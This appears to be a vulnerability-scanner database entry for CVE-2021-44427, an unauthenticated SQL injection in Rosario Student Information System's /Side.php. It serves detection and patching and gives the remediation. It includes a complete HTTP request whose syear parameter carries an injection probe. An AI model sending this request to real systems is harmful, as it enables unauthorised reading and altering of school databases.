| Title | Rosario Student Information System Unauthenticated SQL Injection |
|---|---|
| Author | furkansayim,xShuden |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands. |
| Remediation | Upgrade to version 8.1.1 or higher. |
| CVSS Score | 9.8 |
| EPSS Score | 0.84943 |
| CVE ID | CVE-2021-44427 |
| CWE ID | CWE-89 |
| Tags | cve cve2021 sqli rosariosis vkev vuln |
An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
POST /Side.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Content-Length: 26
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip
sidefunc=update&syear=111'
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44427.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-44427.pcap
N/AN/A